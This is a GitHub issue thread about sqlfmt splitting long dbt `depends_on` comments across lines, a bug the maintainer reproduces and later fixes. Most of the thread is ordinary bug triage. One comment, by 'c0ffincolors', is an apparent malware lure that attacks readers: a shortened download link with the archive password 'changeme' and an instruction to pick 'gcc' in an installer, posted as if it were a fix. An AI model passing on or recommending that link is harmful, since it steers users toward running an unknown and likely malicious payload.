### ISSUE TITLE
sqlfmt breaks up depends_on statements across multiple lines, causing an error in parsing

### ISSUE THREAD

**Issue by ryantimjohn** [tconbeer/sqlfmt#628]
**Describe the bug**
sqlfmt breaks up depends_on statements across multiple lines, causing an error in parsing.

**To Reproduce**

Take a sufficiently long `depends_on` statement from the top a sql file in a dbt project, for instance:
```
-- depends_on: {{ ref('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') }}
```

sqlfmt will break it across multiple lines, like so:
```
-- depends_on: {{
-- ref('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') }}
```

dbt is unable to correctly parse this:
`bad operand type for unary -: 'BigQueryRelation'`

**Expected behavior**
sqlfmt should leave `depends_on` statements on a single line so they correctly parse, no matter what the length.

**Additional context**
`sqlfmt, version 0.23.2`

```
package shandy-sqlfmt 0.23.2, installed using Python 3.11.3
    - sqlfmt
    - sqlfmt_primer
```

**Comment by tconbeer** [comment]
I can't reproduce this, with or without `jinjafmt`. I get:

```bash
~/open/sqlfmt main ≡  3.11 ❯ sqlfmt -                                                                                                                          10:17:25
-- depends_on: {{ref('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') }}
-- depends_on:
-- {{ref('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') }}


1 file formatted.
0 files left unchanged.
- formatted.
~/open/sqlfmt main ≡  3.11 ❯ sqlfmt --no-jinjafmt -
-- depends_on: {{ref('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') }}
-- depends_on:
-- {{ref('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') }}


1 file formatted.
0 files left unchanged.
- formatted.
```

(where the whole jinja tag gets moved to the second line, but that should be perfectly valid for dbt)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ryantimjohn** [comment]
> I can't reproduce this, with or without `jinjafmt`. I get:
> 
> ```shell
> ~/open/sqlfmt main ≡  3.11 ❯ sqlfmt -                                                                                                                          10:17:25
> -- depends_on: {{ref('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') }}
> -- depends_on:
> -- {{ref('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') }}
> 
> 
> 1 file formatted.
> 0 files left unchanged.
> - formatted.
> ~/open/sqlfmt main ≡  3.11 ❯ sqlfmt --no-jinjafmt -
> -- depends_on: {{ref('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') }}
> -- depends_on:
> -- {{ref('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') }}
> 
> 
> 1 file formatted.
> 0 files left unchanged.
> - formatted.
> ```
> 
> (where the whole jinja tag gets moved to the second line, but that should be perfectly valid for dbt)

This is so bizarre, don't know why we're getting such different results!

**Comment by ryantimjohn** [comment]
@tconbeer so sorry, I made a copy-paste error, try formatting this:
```
-- depends_on: {{ ref('xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') }}
```

**Comment by tconbeer** [comment]
yeah ok that did it. thanks for the report.

**Comment by ryantimjohn** [comment]
Happy to help with a PR if you can point me to where I can work on it!

**Comment by tconbeer** [comment]
Thanks. It's this method:

https://github.com/tconbeer/sqlfmt/blob/e9205a9acaaa8726b6e35bb7e5a2244cbaff5860/src/sqlfmt/comment.py#L146-L163

Probably best to check the contents of the comment for a jinja tag (`{{...}}` or `{%...%}` pair) and skip splitting the comment if we find one.

**Comment by tconbeer** [comment]
closed by #642
